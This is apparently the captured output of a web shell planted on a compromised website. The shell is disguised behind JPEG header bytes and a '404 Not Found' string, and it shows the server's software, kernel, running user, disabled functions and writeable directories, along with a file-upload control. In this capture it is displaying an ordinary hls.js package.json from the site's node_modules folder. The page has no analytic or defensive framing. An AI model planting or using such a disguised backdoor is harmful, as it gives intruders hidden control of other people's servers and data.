����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/okanime.top/layout/default/node_modules/hls.js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/okanime.top/layout/default/node_modules/hls.js/package.json
{
  "name": "hls.js",
  "license": "Apache-2.0",
  "description": "JavaScript HLS client using MediaSourceExtension",
  "homepage": "https://github.com/video-dev/hls.js",
  "authors": "Guillaume du Pontavice <[email protected]>",
  "repository": {
    "type": "git",
    "url": "https://github.com/video-dev/hls.js"
  },
  "bugs": {
    "url": "https://github.com/video-dev/hls.js/issues"
  },
  "main": "./dist/hls.js",
  "module": "./dist/hls.mjs",
  "types": "./dist/hls.js.d.ts",
  "exports": {
    ".": {
      "types": "./dist/hls.js.d.ts",
      "import": "./dist/hls.mjs",
      "require": "./dist/hls.js"
    },
    "./dist/*": "./dist/*",
    "./package.json": "./package.json"
  },
  "files": [
    "dist/**/*",
    "src/**/*"
  ],
  "publishConfig": {
    "access": "public"
  },
  "scripts": {
    "build": "rollup --config && npm run build:types",
    "build:ci": "rollup --config && tsc --build tsconfig-lib.json && api-extractor run && es-check",
    "build:debug": "rollup --config --configType full --configType demo",
    "build:watch": "rollup --config --configType full --configType demo --watch",
    "build:types": "tsc --build tsconfig-lib.json && api-extractor run --local",
    "dev": "run-p build:watch serve",
    "serve": "http-server -o '/demo' .",
    "docs": "doctoc ./docs/API.md && api-documenter markdown -i api-extractor -o api-extractor/api-documenter && rm api-extractor/api-documenter/index.md && npm run docs-md-to-html",
    "docs-md-to-html": "generate-md --layout github --input api-extractor/api-documenter --output api-docs",
    "lint": "eslint src/ tests/ --ext .js --ext .ts",
    "lint:fix": "npm run lint -- --fix",
    "lint:quiet": "npm run lint -- --quiet",
    "lint:staged": "lint-staged",
    "prettier": "prettier --write .",
    "prettier:verify": "prettier --check .",
    "pretest": "npm run lint",
    "sanity-check": "npm run lint && npm run prettier:verify && npm run type-check && npm run build && es-check && npm run docs && npm run test:unit",
    "start": "npm run dev",
    "test": "npm run test:unit && npm run test:func",
    "test:unit": "karma start karma.conf.js",
    "test:unit:debug": "DEBUG_UNIT_TESTS=1 karma start karma.conf.js --auto-watch --no-single-run --browsers Chrome",
    "test:unit:watch": "karma start karma.conf.js --auto-watch --no-single-run",
    "test:func": "BABEL_ENV=development mocha --require @babel/register tests/functional/auto/setup.js --timeout 40000 --exit",
    "test:func:light": "BABEL_ENV=development HLSJS_LIGHT=1 mocha --require @babel/register tests/functional/auto/setup.js --timeout 40000 --exit",
    "test:func:sauce": "SAUCE=1 UA=safari OS='OS X 10.15' BABEL_ENV=development mocha --require @babel/register tests/functional/auto/setup.js --timeout 40000 --exit",
    "type-check": "tsc --noEmit",
    "type-check:watch": "npm run type-check -- --watch",
    "prepare": "husky install"
  },
  "devDependencies": {
    "@babel/core": "7.21.8",
    "@babel/helper-module-imports": "7.21.4",
    "@babel/plugin-proposal-class-properties": "7.18.6",
    "@babel/plugin-proposal-object-rest-spread": "7.20.7",
    "@babel/plugin-proposal-optional-chaining": "7.21.0",
    "@babel/plugin-transform-object-assign": "7.18.6",
    "@babel/preset-env": "7.21.5",
    "@babel/preset-typescript": "7.21.5",
    "@babel/register": "7.21.0",
    "@microsoft/api-documenter": "7.22.4",
    "@microsoft/api-extractor": "7.34.8",
    "@rollup/plugin-alias": "5.0.0",
    "@rollup/plugin-babel": "6.0.3",
    "@rollup/plugin-commonjs": "24.1.0",
    "@rollup/plugin-node-resolve": "15.0.2",
    "@rollup/plugin-replace": "5.0.2",
    "@rollup/plugin-terser": "0.4.1",
    "@rollup/plugin-typescript": "11.1.0",
    "@types/chai": "4.3.5",
    "@types/chart.js": "2.9.37",
    "@types/mocha": "10.0.1",
    "@types/sinon-chai": "3.2.9",
    "@typescript-eslint/eslint-plugin": "5.59.2",
    "@typescript-eslint/parser": "5.59.2",
    "babel-loader": "9.1.2",
    "babel-plugin-transform-remove-console": "6.9.4",
    "chai": "4.3.7",
    "chart.js": "2.9.4",
    "chromedriver": "112.0.1",
    "doctoc": "2.2.1",
    "es-check": "7.1.1",
    "eslint": "8.39.0",
    "eslint-config-prettier": "8.8.0",
    "eslint-plugin-import": "2.27.5",
    "eslint-plugin-mocha": "10.1.0",
    "eslint-plugin-node": "11.1.0",
    "eslint-plugin-promise": "6.1.1",
    "eventemitter3": "5.0.1",
    "http-server": "14.1.1",
    "husky": "8.0.3",
    "jsonpack": "1.1.5",
    "karma": "6.4.2",
    "karma-chrome-launcher": "3.2.0",
    "karma-coverage": "2.2.0",
    "karma-mocha": "2.0.1",
    "karma-mocha-reporter": "2.2.5",
    "karma-rollup-preprocessor": "7.0.8",
    "karma-sinon-chai": "2.0.2",
    "karma-sourcemap-loader": "0.4.0",
    "lint-staged": "13.2.2",
    "markdown-styles": "3.2.0",
    "micromatch": "4.0.5",
    "mocha": "10.2.0",
    "node-fetch": "3.3.1",
    "npm-run-all": "4.1.5",
    "prettier": "2.8.8",
    "promise-polyfill": "8.3.0",
    "rollup": "3.21.5",
    "rollup-plugin-istanbul": "4.0.0",
    "sauce-connect-launcher": "1.3.2",
    "selenium-webdriver": "4.9.0",
    "semver": "7.5.0",
    "sinon": "15.0.4",
    "sinon-chai": "3.7.0",
    "typescript": "5.0.4",
    "url-toolkit": "2.2.5",
    "wrangler": "2.20.0"
  },
  "version": "1.4.12"
}

ZeroDay Forums Mini